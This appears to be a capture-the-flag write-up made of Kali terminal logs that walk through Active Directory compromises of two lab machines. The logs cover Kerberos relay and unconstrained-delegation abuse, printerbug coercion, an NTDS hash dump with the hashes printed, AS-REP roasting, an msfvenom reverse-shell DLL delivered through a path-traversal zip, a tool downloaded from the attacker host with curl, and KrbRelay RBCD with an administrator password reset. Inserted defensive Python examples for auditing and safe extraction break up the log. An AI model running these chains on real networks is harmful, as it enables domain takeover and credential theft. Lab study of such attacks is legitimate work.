┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ pip3 install -r requirements.txt
Processing /home/puck/vulnhub/delegate/krbrelayx/bloodyAD
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Collecting asn1crypto>=1.3.0 (from bloodyAD==2.0.3->-r requirements.txt (line 1))
--snip--
Successfully built bloodyAD
Installing collected packages: wcwidth, asn1crypto, unicrypto, tqdm, tabulate, prompt-toolkit, oscrypto, h11, winacl, asysocks, minikerberos, asyauth, msldap, bloodyAD
Successfully installed asn1crypto-1.5.1 asyauth-0.0.20 asysocks-0.2.12 bloodyAD-2.0.3 h11-0.14.0 minikerberos-0.4.4 msldap-0.5.10 oscrypto-1.3.0 prompt-toolkit-3.0.47 tabulate-0.9.0 tqdm-4.66.4 unicrypto-0.0.10 wcwidth-0.2.13 winacl-0.1.9
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ 

.

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC 
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache

Using Powermad & printerbug

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ evil-winrm -i DC1.delegate.vl -u N.Thompson -p KALEB_2341
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> upload Powermad.ps1
                                        
Info: Uploading /home/puck/vulnhub/delegate/Powermad.ps1 to C:\Users\N.Thompson\Documents\Powermad.ps1
                                        
Data: 180768 bytes of 180768 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
[+] Machine account PWNED added
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384
[+] Machine account pwned attribute useraccountcontrol updated
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append
[+] Machine account pwned attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl
HTTP/PWNED.delegate.vl
RestrictedKrbHost/PWNED
HOST/PWNED
RestrictedKrbHost/PWNED.delegate.vl
HOST/PWNED.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> 
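The bloodyAD call earlier sets TRUSTED_FOR_DELEGATION by name, while the Powermad call above writes the raw value 528384 into userAccountControl. As an added example, not code from the write-up, bloodyAD or Powermad, the following Python decodes a userAccountControl value into its flag names using the documented Microsoft bit values and audits a set of accounts for the delegation and pre-authentication settings a defender should review; the function names and the accounts in SAMPLE_ACCOUNTS are assumptions constructed for illustration.

```python
# Added example: decode userAccountControl and audit delegation-related flags.
# Flag values are the documented Microsoft constants for userAccountControl;
# the account table in SAMPLE_ACCOUNTS is constructed for illustration.

UAC_FLAGS = {
    0x00000001: "SCRIPT",
    0x00000002: "ACCOUNTDISABLE",
    0x00000008: "HOMEDIR_REQUIRED",
    0x00000010: "LOCKOUT",
    0x00000020: "PASSWD_NOTREQD",
    0x00000040: "PASSWD_CANT_CHANGE",
    0x00000080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x00000100: "TEMP_DUPLICATE_ACCOUNT",
    0x00000200: "NORMAL_ACCOUNT",
    0x00000800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x00001000: "WORKSTATION_TRUST_ACCOUNT",
    0x00002000: "SERVER_TRUST_ACCOUNT",
    0x00010000: "DONT_EXPIRE_PASSWORD",
    0x00020000: "MNS_LOGON_ACCOUNT",
    0x00040000: "SMARTCARD_REQUIRED",
    0x00080000: "TRUSTED_FOR_DELEGATION",
    0x00100000: "NOT_DELEGATED",
    0x00200000: "USE_DES_KEY_ONLY",
    0x00400000: "DONT_REQ_PREAUTH",
    0x00800000: "PASSWORD_EXPIRED",
    0x01000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x04000000: "PARTIAL_SECRETS_ACCOUNT",
}

# Settings worth a second look on any account that is not a domain controller.
RISKY_FLAGS = {
    "TRUSTED_FOR_DELEGATION",          # unconstrained delegation: the account collects forwarded TGTs
    "TRUSTED_TO_AUTH_FOR_DELEGATION",  # constrained delegation with protocol transition
    "DONT_REQ_PREAUTH",                # AS-REP roastable
    "PASSWD_NOTREQD",                  # may legitimately have an empty password
}


def decode_uac(value):
    """Return the names of the flags set in a userAccountControl integer, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def encode_uac(names):
    """Inverse of decode_uac: build the integer from a list of flag names."""
    by_name = {name: bit for bit, name in UAC_FLAGS.items()}
    value = 0
    for name in names:
        value |= by_name[name]
    return value


def audit_accounts(accounts):
    """accounts maps sAMAccountName -> userAccountControl.

    Returns {name: [risky flag names]} for every account carrying one. Domain
    controllers (SERVER_TRUST_ACCOUNT) legitimately carry TRUSTED_FOR_DELEGATION,
    so that flag is not reported for them.
    """
    findings = {}
    for name, value in accounts.items():
        flags = decode_uac(value)
        risky = [f for f in flags if f in RISKY_FLAGS]
        if "SERVER_TRUST_ACCOUNT" in flags:
            risky = [f for f in risky if f != "TRUSTED_FOR_DELEGATION"]
        if risky:
            findings[name] = risky
    return findings


# Constructed sample: a DC, a normal user, a roastable service account and a
# freshly added machine account with unconstrained delegation (528384, the
# value written in the Powermad step).
SAMPLE_ACCOUNTS = {
    "DC1$": 0x2000 | 0x80000,        # SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION (expected on a DC)
    "j.doe": 0x200 | 0x10000,        # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    "svc_example": 0x200 | 0x400000, # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
    "PWNED$": 528384,                # WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION
}

if __name__ == "__main__":
    print(decode_uac(528384))
    for account, flags in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(f"{account}: {', '.join(flags)}")
```

Running the block prints the two flags behind 528384 and then flags only svc_example and PWNED$; DC1$ is skipped because unconstrained delegation is the normal state of a domain controller. The same decoder applies to the userAccountControl values in BloodHound or LDAP exports, so an audit of every non-DC account with TRUSTED_FOR_DELEGATION is a short loop over such a dump.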

Set up the listener (then wait for a connection)

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.105.77
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

Add the DNS record with dnstool.py, then start printerbug

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\pwned$' -p 12345 -r PWNED.delegate.vl -d 10.8.2.138 --action add -dns-ip 10.10.105.77 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
 addspn.py  'DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache'   krbrelayx.py   LICENSE      printerbug.py   venv
 bloodyAD    dnstool.py                                    lib            PetitPotam   README.md
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 printerbug.py delegate.vl/'PWNED$'@dc1.delegate.vl PWNED.delegate.vl
[*] Impacket v0.11.0 - Copyright 2023 Fortra

Password:12345
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]

Use impacket-secretsdump with the exported DC1$ ticket to get the hashes.

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ klist                                                               
Ticket cache: FILE:/home/puck/vulnhub/delegate/krbrelayx/DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Default principal: DC1$@DELEGATE.VL

Valid starting       Expires              Service principal
06/12/2024 07:13:23  06/12/2024 17:07:36  krbtgt/DELEGATE.VL@DELEGATE.VL
    renew until 06/19/2024 07:07:36
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ impacket-secretsdump -k DC1.delegate.vl -just-dc-ntlm               
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32<REDACTED>e93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:6d93f6dbd8902d77f43e04bb1b1b5c6e:::
PWNED$:3101:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
[*] Cleaning up... 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
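The secretsdump output above is in pwdump format (user:rid:lmhash:nthash:::). As an added example, not code from the write-up or from Impacket, the following Python parses such a dump and runs the checks a defender performs after an authorized extraction: accounts whose NT hash is that of the empty password, accounts that still store an LM hash, and accounts sharing one NT hash (the same password). The sample dump and its function names are constructed; apart from the well-known empty-password values, the hashes in it are placeholders.

```python
import re
from collections import defaultdict

# Well-known hashes of the empty password (LM is the value stored when LM hashing is disabled).
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# One pwdump line: user:rid:lmhash:nthash:::  (user may carry a domain\ prefix)
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample transcript; only the Guest line carries a real (empty-password) hash.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1104:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy.user:1105:0f20048efc645d0a9e5d0d5f93c8f4d1:fedcba9876543210fedcba9876543210:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:89abcdef0123456789abcdef01234567:::
[*] Cleaning up...
"""


def parse_dump(text):
    """Return a list of {user, rid, lm, nt} dicts; lines that are not hash lines are skipped."""
    rows = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if match:
            rows.append(match.groupdict())
    return rows


def audit_dump(text):
    """Password-hygiene checks over a parsed dump."""
    findings = {"empty_password": [], "lm_hash_stored": [], "shared_password": []}
    by_nt = defaultdict(list)
    for row in parse_dump(text):
        nt, lm = row["nt"].lower(), row["lm"].lower()
        if nt == EMPTY_NT:
            findings["empty_password"].append(row["user"])
        if lm != EMPTY_LM:
            findings["lm_hash_stored"].append(row["user"])
        by_nt[nt].append(row["user"])
    # Two or more accounts with one NT hash share a password (salting does not exist for NT hashes).
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings["shared_password"].append(sorted(users))
    return findings


if __name__ == "__main__":
    for check, hits in audit_dump(SAMPLE_DUMP).items():
        print(f"{check}: {hits}")
```

Because NT hashes are unsalted, the shared-password check needs no cracking at all: identical hashes mean identical passwords, which is how a service account reusing the administrator's password shows up immediately after a DCSync-style extraction.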

.

What a ride.

 

vulnlab-bruno

vulnlab bruno

a hard machine

Tools used : impacket-GetNPUsers, crackmapexec, bloodhound-python, msfvenom, impacket-smbclient, KrbRelay.exe, KrbRelayUp.exe, Rubeus.exe, impacket-ticketConverter, impacket-secretsdump, evil-winrm

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-GetNPUsers bruno.vl/svc_scan -dc-ip 10.10.124.39               
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate svc_scan, getting its TGT
$krb5asrep$23$svc_scan@BRUNO.VL:09ca9d7e711a56a1f32bb669a42453f7$4010b699655764a235ad95abe2edf6fd2b368f73aebb7f9fac8fd62152c57ce7d08cb2a8e028ef84323485cda101d51cb4151fc1fdb0a9773bc103647303d0401aabf77c6b4e141786fa7e8e675987b8ece6a6cb947dc7a64825da5d64aa1d4f24a0638ec7b9cc96d64a241e719126cebb8488e92c6c0a9edcdbaff4d0ba71be1c37b76d1dcc3c85f500ae573ee25e5db14fef6eab9e3c55e245c318fc5308ebd54eaa6ebaede68b11601da50cb738df8a53736ab8f5be08b099d797f95067f0741d305500a7f5762e0a088fa9b29d02092a86eef3b53aa575e916007eb089b8da462e9a
                                  
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ john svc_scan.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Sunshine1        ($krb5asrep$23$svc_scan@BRUNO.VL)     
1g 0:00:00:00 DONE 2/3 (2024-06-09 11:01) 16.66g/s 850166p/s 850166c/s 850166C/s Piano..Open
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 


 

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ crackmapexec smb bruno.vl -u 'svc_scan' -p 'Sunshine1' --shares
SMB         brunodc.bruno.vl 445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB         brunodc.bruno.vl 445    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
SMB         brunodc.bruno.vl 445    BRUNODC          [+] Enumerated shares
SMB         brunodc.bruno.vl 445    BRUNODC          Share           Permissions     Remark
SMB         brunodc.bruno.vl 445    BRUNODC          -----           -----------     ------
SMB         brunodc.bruno.vl 445    BRUNODC          ADMIN$                          Remote Admin
SMB         brunodc.bruno.vl 445    BRUNODC          C$                              Default share
SMB         brunodc.bruno.vl 445    BRUNODC          CertEnroll      READ            Active Directory Certificate Services share
SMB         brunodc.bruno.vl 445    BRUNODC          IPC$            READ            Remote IPC
SMB         brunodc.bruno.vl 445    BRUNODC          NETLOGON        READ            Logon server share 
SMB         brunodc.bruno.vl 445    BRUNODC          queue           READ,WRITE      
SMB         brunodc.bruno.vl 445    BRUNODC          SYSVOL          READ            Logon server share 
                                                   

Some BloodHound analysis

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ bloodhound-python -d bruno.vl -c all -u 'svc_scan' -p 'Sunshine1' -ns 10.10.84.244      
INFO: Found AD domain: bruno.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: brunodc.bruno.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: brunodc.bruno.vl
INFO: Found 16 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: brunodc.bruno.vl
INFO: Done in 00M 05S

Creating the msfvenom payload & using KrbRelay

For the payload I used an msfvenom reverse shell and saved it as Microsoft.DiaSymReader.Native.amd64.dll, and created the zip file with a path traversal using 7zip (renaming the zipped file to ../app/Microsoft.DiaSymReader.Native.amd64.dll).

 

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.2.138 LPORT=9001 -f dll > Microsoft.DiaSymReader.Native.amd64.dll     
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
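The archive described above only works because the extractor on the other side trusts the entry name, so an entry such as ../app/Microsoft.DiaSymReader.Native.amd64.dll is written outside the folder it was meant for (the Zip Slip pattern). The following Python is an added example, not code from the write-up or from the target service: a naive extractor beside a hardened one that resolves every entry against the destination and refuses anything that lands outside it. The archive contents, the queue/ and app/ directory names and the function names are constructed to mirror the share layout in the write-up.

```python
import io
import os
import tempfile
import zipfile

# Constructed entry name that climbs one level up and into a sibling directory.
TRAVERSAL_NAME = "../app/Microsoft.DiaSymReader.Native.amd64.dll"


def build_sample_zip():
    """Constructed archive: one harmless entry and one whose name escapes the extraction dir."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.txt", "harmless content")
        zf.writestr(TRAVERSAL_NAME, "placeholder text, not a DLL")
    return buf.getvalue()


def unsafe_extract(data, dest):
    """Naive extractor: joins dest with the entry name as-is, so '..' walks out of dest."""
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(target))
    return written


def safe_extract(data, dest):
    """Hardened extractor: resolve each target and refuse anything outside dest.

    Returns (written_paths, rejected_entry_names).
    """
    dest_real = os.path.realpath(dest)
    written, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            # commonpath equals dest_real only when target is dest_real itself or inside it;
            # this also catches absolute entry names, which os.path.join would honour.
            if os.path.commonpath([dest_real, target]) != dest_real:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(target)
    return written, rejected


def demo():
    """Run both extractors against the sample in a throwaway tree shaped like the share (queue/ beside app/)."""
    data = build_sample_zip()
    root = os.path.realpath(tempfile.mkdtemp())
    queue = os.path.join(root, "queue")
    app_dll = os.path.join(root, "app", "Microsoft.DiaSymReader.Native.amd64.dll")
    os.makedirs(queue)

    written_safe, rejected = safe_extract(data, queue)
    escaped_after_safe = os.path.exists(app_dll)

    unsafe_extract(data, queue)
    escaped_after_unsafe = os.path.exists(app_dll)

    return {
        "rejected": rejected,
        "safe_written": [os.path.relpath(p, root).replace(os.sep, "/") for p in written_safe],
        "escaped_after_safe": escaped_after_safe,
        "escaped_after_unsafe": escaped_after_unsafe,
    }


if __name__ == "__main__":
    print(demo())
```

Note that zipfile.ZipFile.extractall already strips leading ".." components, so in Python the naive form only appears when code builds the output path by hand; extractors in other languages and libraries vary, which is why the realpath-plus-commonpath check belongs in any service that unpacks user-supplied archives.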

.

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-smbclient bruno/svc_net:Sunshine1@bruno.vl                                     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
CertEnroll
IPC$
NETLOGON
queue
SYSVOL
# use queue
# rm evil3.zip
# ls
drw-rw-rw-          0  Mon Jun 10 04:15:54 2024 .
drw-rw-rw-          0  Mon Jun 10 03:39:44 2024 ..
# put Microsoft.DiaSymReader.Native.amd64.zip
# ls
drw-rw-rw-          0  Mon Jun 10 04:16:22 2024 .
drw-rw-rw-          0  Mon Jun 10 03:39:44 2024 ..
-rw-rw-rw-       1994  Mon Jun 10 04:16:22 2024 Microsoft.DiaSymReader.Native.amd64.zip
# 

 

Getting Root with Resource Based Constrained Delegation (RBCD)

I used: https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_Any/KrbRelay.exe

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.84.244] 65278
Microsoft Windows [Version 10.0.20348.768]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name      SID                                           
============== ==============================================
bruno\svc_scan S-1-5-21-1536375944-4286418366-3447278137-1104


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes                                        
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                          Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                               Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                       Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

c:\Users\svc_scan\Desktop>curl http://10.8.2.138:8000/KrbRelay.exe -o KrbRelay.exe
curl http://10.8.2.138:8000/KrbRelay.exe -o KrbRelay.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1581k  100 1581k    0     0  3664k      0 --:--:-- --:--:-- --:--:-- 3685k

c:\Users\svc_scan\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 123D-CFA3

 Directory of c:\Users\svc_scan\Desktop

06/10/2024  08:32 AM    <DIR>          .
06/29/2022  04:09 PM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
06/10/2024  08:32 AM         1,618,944 KrbRelay.exe
               3 File(s)      1,620,025 bytes
               2 Dir(s)  15,324,868,608 bytes free

c:\Users\svc_scan\Desktop>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\svc_scan\Desktop> ./KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-1116 -ssl -port 10246 -reset-password administrator Puckie71#
./KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-1116 -ssl -port 10246 -reset-password administrator Puckie71#
[*] Relaying context: bruno.vl\BRUNODC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\svc_scan\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAABr15/LWcZ9/+EJA1xQswkDAsgAAAgP//9OCOsICNkdgCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: --snip--
[*] bind: 0
[*] ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[*] apRep1: 6f8188308185a003020105a10302010fa2793077a003020112a270046eaaccbc427c537bd34cfaad3ccfe07faa4cc962d5d69beb23751a7b161e376ba5ef59142de74e813e06d6168ec95cde528b4740c0c81d6e44a7dcb8880cd1cfaf1f3015610a007d87ee3d682637a6d952cbbde71f8696d20c62f3e9bca547a0eb1933e366562379501f7755ad4db3
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a24404429d0e40f70e6a4260c81b4b46a52e91a7459b6722a628653d073e9bfa243ceb1f619595cbadaeb7191cd7e3b0b32f0c3b0d78cfe0bb84f7a77250816d2dd30e49a692
[*] bind: 0
[*] ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
[*] ldap_modify: LDAP_SUCCESS
[*] ldap_modify: LDAP_SUCCESS
PS C:\Users\svc_scan\Desktop> 

.

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ evil-winrm -i bruno.vl -u 'Administrator' -p 'Puckie71#'         

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
